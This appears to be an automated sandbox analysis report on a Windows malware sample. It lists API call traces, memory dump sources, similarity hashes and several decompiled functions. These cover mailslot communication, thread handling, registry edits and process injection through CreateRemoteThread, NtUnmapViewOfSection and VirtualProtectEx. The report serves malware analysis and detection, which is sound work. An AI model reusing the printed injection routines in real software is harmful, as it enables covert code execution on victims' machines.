  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
